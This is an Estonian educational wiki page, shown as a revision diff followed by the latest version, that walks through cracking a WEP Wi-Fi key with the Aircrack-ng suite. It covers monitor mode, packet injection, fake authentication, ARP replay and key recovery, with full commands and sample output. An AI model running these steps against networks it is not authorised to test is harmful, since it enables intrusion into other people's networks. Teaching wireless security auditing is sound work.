Aircrack: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Ktragel (talk | contribs)
Ktragel (talk | contribs)
 
(33 intermediate revisions by the same user not shown)
Line 1: Line 1:
=Sissejuhatus=
=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.  
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.
 
==Üldkirjeldus==
 
Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset ja juhtida tähelepanu selles haavatavatele kohtadele. <code>aircrack-ng</code>, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks
 
==Süntaks==
 
aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>
 
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]


=Eeldused=
=Eeldused=
Line 11: Line 26:
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])


WiFi adapteri vaatamine:
WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>
<pre>lspci -nn | grep Network</pre>


või rohkema informatsiooni saamiseks:
või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:


<pre>lshw -class network</pre>
<pre>lshw -class network</pre>
Line 39: Line 54:


<<!-- Warning style viksitud ArchWikist -->div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>
<<!-- Warning style viksitud ArchWikist -->div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>
=Üldkirjeldus=
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks
==Süntaks==
aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]


=Installeerimine=
=Installeerimine=
Line 60: Line 60:
<pre>sudo apt-get update</pre>
<pre>sudo apt-get update</pre>


Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>
<pre>sudo apt-get install aircrack-ng</pre>


=WEP võtme murdmine=
=WEP võtme murdmine=


Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:  
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:  
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
Line 73: Line 73:


==Eesmärk==
==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.
<br>
 
<br>
==Lühikesed tegevussammud==
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:<br>
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>:<br>
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)<br>
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)<br>
2. Testime „süstimise“ suutlikkust pääsupunktile <br>
2. Testime „süstimise“ suutlikkust pääsupunktile <br>
Line 86: Line 85:


==Näide WEP võtme lahti murdmise protsessist==
==Näide WEP võtme lahti murdmise protsessist==
<br>


'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<br>
'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref><br>
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.
   
   
Peata ath0 liidese:
Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>
<pre>airmon-ng stop ath0</pre>


Line 109: Line 107:


wifi0    no wireless extensions.</pre>
wifi0    no wireless extensions.</pre>
 
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.


Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>
<pre>airmon-ng start wifi0 9</pre>


Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.
'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.


Tulemus:  
Tulemus:  
Line 123: Line 120:
  ath0            Atheros        madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>
  ath0            Atheros        madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>


Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.
'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.


Veendumaks, et liides on korrektselt üles seatud:
Veendumaks, et liides on korrektselt üles seatud:
Line 145: Line 142:
       Tx excessive retries:0  Invalid misc:0  Missed beacon:0</pre>
       Tx excessive retries:0  Invalid misc:0  Missed beacon:0</pre>


Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
<br>
<br>
<br>
<br>
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<br>
<br>
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref><br>
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.
   
   
Line 154: Line 152:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0</pre>
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0</pre>


''Selgituseks:
''Selgituseks:''<br>
-9 - “süstimise” test
''-9 - “süstimise” test''<br>
-e teddy – raadiovõrgu nimi
''-e teddy – raadiovõrgu nimi''<br>
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress''<br>
ath0 – raadiovõrgu liides''
''ath0 – raadiovõrgu liides''


Tulemus:  
Tulemus:  
Line 171: Line 169:
09:23:39  30/30: 100%</pre>
09:23:39  30/30: 100%</pre>


Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.   
'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.   
<br>
<br>
<br>
<br>
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<br>
<br>
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref><br>
Ava uus konsooliaken ja sisesta:  
Ava uus konsooliaken ja sisesta:  
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>


''Selgituseks:
''Selgituseks:''<br>
-c 9 – raadiovõrgu kanal
''-c 9 – raadiovõrgu kanal''<br>
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda''<br>
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''


Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
Line 195: Line 194:
<br>
<br>
<br>
<br>
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<br>
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref><br>
Ava uus konsooliaken ja sisesta:
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>


''Selgitus:
''Selgitus:''<br>
-1 – võlts autentimine
''-1 – võlts autentimine''<br>
0 – kordusühendus(t)e aeg sekundites
''0 – kordusühendus(t)e aeg sekundites''<br>
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''


Õnnestumise korral on tulemus:  
Õnnestumise korral on tulemus:  
Line 208: Line 207:
18:18:20  Authentication successful
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Sending Association Request
18:18:20  Association successful :-)
18:18:20  Association successful :-)</pre>
 
Ebaõnnestumise korral on tulemus:  
Ebaõnnestumise korral on tulemus:  
8:28:02  Sending Authentication Request
<pre>8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Sending Association Request
Line 223: Line 223:
<br>
<br>
<br>
<br>
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<br>
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref><br>
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.  
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.  


Line 235: Line 235:
<br>
<br>
<br>
<br>
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<br>
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref><br>
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.  
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.  


Line 242: Line 242:
''
''
Selgitus:
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub''<br>
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''


Tulemus:
Tulemus:
Line 259: Line 259:
=Kokkuvõte=
=Kokkuvõte=


 
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.


=Kasutatud kirjandus=
=Kasutatud kirjandus=
<references/>
<references />


=Autor=
=Autor=

Latest revision as of 11:36, 26 May 2015

Sissejuhatus

Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

Üldkirjeldus

Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset ja juhtida tähelepanu selles haavatavatele kohtadele. aircrack-ng, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm[1]. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu[2]:

  • airodump-ng - programm pakettide püüdmiseks
  • aireplay-ng - programm pakettide „süstimiseks“
  • aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
  • airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

Süntaks

aircrack-ng süntaks näeb välja järgmine[3]:

aircrack-ng [võti] <püütud fail(id)>

Nimekirja võtmetele leiab SIIT!

Eeldused

  • Elementaarne käsurea kasutamisoskus
  • Teadmised WiFi, WEP, WPA/WPA2 kohta
  • Võrgus vähemalt 1 aktiivne klient
  • Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
  • Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
  • aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: siit ja siit)

WiFi adapteri vaatamine[4]:

lspci -nn | grep Network

või rohkema informatsiooni saamiseks[5]:

lshw -class network

Tulemuseks saame midagi sarnast:

02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)

või

*-network
       description: Wireless interface
       product: Centrino Advanced-N 6205 [Taylor Peak]
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: wlan0
       version: 34
       serial: 6c:88:14:1d:29:c4
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
       resources: irq:32 memory:f7d00000-f7d01fff
Pane tähele! Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone.

Installeerimine

Uuendame repositooriumi:

sudo apt-get update

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt[6]:

sudo apt-get install aircrack-ng

WEP võtme murdmine

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja[7]:

  • Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
  • BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
  • ESSID (võrgu nimi): teddy
  • Pääsupunkti kanal: 9
  • Raadiovõrgu liides (ingl. k Wireless interface): ath0

Eesmärk

Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks[8].

Lühikesed tegevussammud

Lühidalt sammudest, mida tegema asume[9]:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)
2. Testime „süstimise“ suutlikkust pääsupunktile
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid

Näide WEP võtme lahti murdmise protsessist

Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi[10]
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:

airmon-ng stop ath0

Tulemus:

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Kontrolli, kas kõik athX liidesed on ikka suletud:

iwconfig

Tulemus:

lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.

Märge: Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval airmon-ng stop athX käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:

airmon-ng start wifi0 9

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:

iwconfig

Tulemus:

lo        no wireless extensions.

wifi0     no wireless extensions.

eth0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:""  Nickname:""
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
       Retry:off   RTS thr:off   Fragment thr:off
       Encryption key:off
       Power Management:off
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!


Samm 2: Testime „süstimise“ suutlikkust pääsupunktile[11]
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0

Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides

Tulemus:

09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP 

09:23:37  Trying directed probe requests...
09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.


Samm 3: Avada airodump-ng pakettide püüdmiseks[12]
Ava uus konsooliaken ja sisesta:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  



Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga[13]
Ava uus konsooliaken ja sisesta:

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress

Õnnestumise korral on tulemus:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Ebaõnnestumise korral on tulemus:

8:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request



Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis[14]
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Tulemus:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...



Samm 6: Ava aircrack-ng salasõna lahti murdmiseks[15]
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Selgitus: -b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”

Tulemus:

                             [00:03:06] Tested 674449 keys (got 96610 IVs)

KB    depth   byte(vote)
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 

                      KEY FOUND! [ 12:34:56:78:90 ] 
     Probability: 100%

Kokkuvõte

